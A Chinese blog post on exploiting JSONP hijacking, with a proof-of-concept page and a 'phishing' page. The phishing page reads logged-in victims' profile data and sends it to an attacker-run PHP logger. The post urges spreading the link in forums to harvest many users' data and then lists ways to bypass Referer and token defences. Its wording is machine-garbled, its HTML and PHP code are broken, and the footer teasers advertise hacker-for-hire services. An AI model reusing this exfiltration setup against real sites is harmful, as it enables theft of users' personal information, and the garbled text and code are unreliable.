小学生都会发掘的 *** ON Hijacking实战使用

访客6年前黑客文章907

*** ON Hijacking缝隙的具体使用,有点相似与CSRF,不过原理使用 *** 不同,在这边文章我侧重解说json跨域绑架的使用环境建立与 *** 。
0×01缝隙的发掘
一般发掘的过程中,burpsuite署理的History做寻觅,过滤剩余不可能存在缝隙的一些链接,如下图所示:

咱们在回来包中json格局发现了如下的灵敏信息(用户Id,用户名,用户手机号码)。

0×02缝隙的证明之poc
提交缝隙,poc在众测时要分秒必争,所以这边用了最精简的一个POC。
假设回来的数据为:
txf({“data”:{“name”:”唐晓峰”}});
html>
head>
script>
function txf(a){
alert(a.data.name);
}
script>
script src=http://***.***.**/wm/User/getUserInfo?callback=txf>script>
body>
html>
即可如下弹窗:

0×03缝隙的使用之垂钓
1.预备一台web服务器,我直接phpstudy搭的。
附上服务器端的代码
json.php
$nickname=$_GET['name'];
$fp = fopen('info.txt','a');
$flag = fwrite($fp, "姓名:  ".$name."rn");
?>html>
垂钓.html
head>    title>txftitle>script> var xmlhttp;    function txf(a)    {    xmlhttp=new XMLHttpRequest() var x="http://***.***.***/json.php?name="+a.data.name; xmlhttp.open("GET", x, true); xmlhttp.send(); }script>>script src=http://***.***.***?callback=txf>script>head>body> textarea>垂钓啦,傻瓜textarea>>body>html>
把垂钓链接http://***.***.***/垂钓.html发给该网站已登陆的用户,如论坛,社区 *** 群,社区贴吧等,服务端即可获取到很多用户灵敏数据。
这边以hackone的一个项目为例:

0×04缝隙的修正与绕过
由于这个比如是小伙伴发过来的还没修正,所以都脱敏了,咱们再从开发修正的视点去考虑怎么绕过修正。
1.Referer白名单
子域名绕过,文件名绕过,空Referer绕过
2.添加token认证
token满足杂乱或许服务端加密,咱们无法绕过,假如token很简单,如纯数字,咱们能够测验遍历绕过
3.接口禁用
无敌的操作,无法绕过
总结:
十分有意思的一个绑架,曾经没有使用过,仅仅知道有这么个东西,一般众测或许项目上遇到我都是直接截图,声明一波灵敏信息走漏,然后就完毕了,很低危,这次实战使用之后,略微提高了一点逼格。
 

相关文章

追款

在本年,咱们还看到了几个“老朋友”,从熟睡中醒来,从头呈现在咱们的视界之中。 在这一章,咱们首要评论一些闻名的歹意安排,因为不明原因(或许是缺少相应的监测)近年来没有发现有太大的动作,但近期又从头呈现...

黑客技术学习,损友圈在哪找黑客,gta5黑客发图找车

默许HTTP 端口: 80 TCP可感知应用程序的网络爬虫(Spider),它能完好的枚举应用程序的内容和功用;『D盾_防火墙』 版别: v2.0.6.70Sequencer(会话)——用来剖析那些不...

暗网黑客接单,qq找黑客,苹果手机被偷了找黑客可以找回来吗

PoCfunction CloseDatabase 然后拿了一些信息,比方数据库暗码:近年来网站被植入后门等隐蔽性进犯呈逐年增加态势,国家互联网应急中心发布的《2013年我国互联网网络安全态势总述》称...

qq电子邮件_淘宝找黑客教务处密码-有人找黑客改成绩成功么

[1][2][3][4]黑客接单渠道在看文章之前咱们首要要向黑客接单提交的作者以及尖刀团队问候,正因为是他们的发表才有了这个东西2.进入地点目录,修正特点:挑选“答应以程序履行文件”,这时分也可以做一...

HTML5离线缓存进犯测验

 本试验选用局域网模仿,经过修正本地HOSTS文件来模仿域名以及DNS诈骗。合法网站运用Linux CentOS7的apache服务器建立,IP为192.168.1.113,HOSTS文件中参加192...

是现代的。女主在赌场认识男主,男主当她是替身,

MS_T120信道管理中涉及到的组件我们在下图中进行了标注。 MS_T120参考信道会在rdpwsx.dll中创建,堆内存也会在rdpwp.sys中分配内存池。 当MS_T120参考信道在信道编号非3...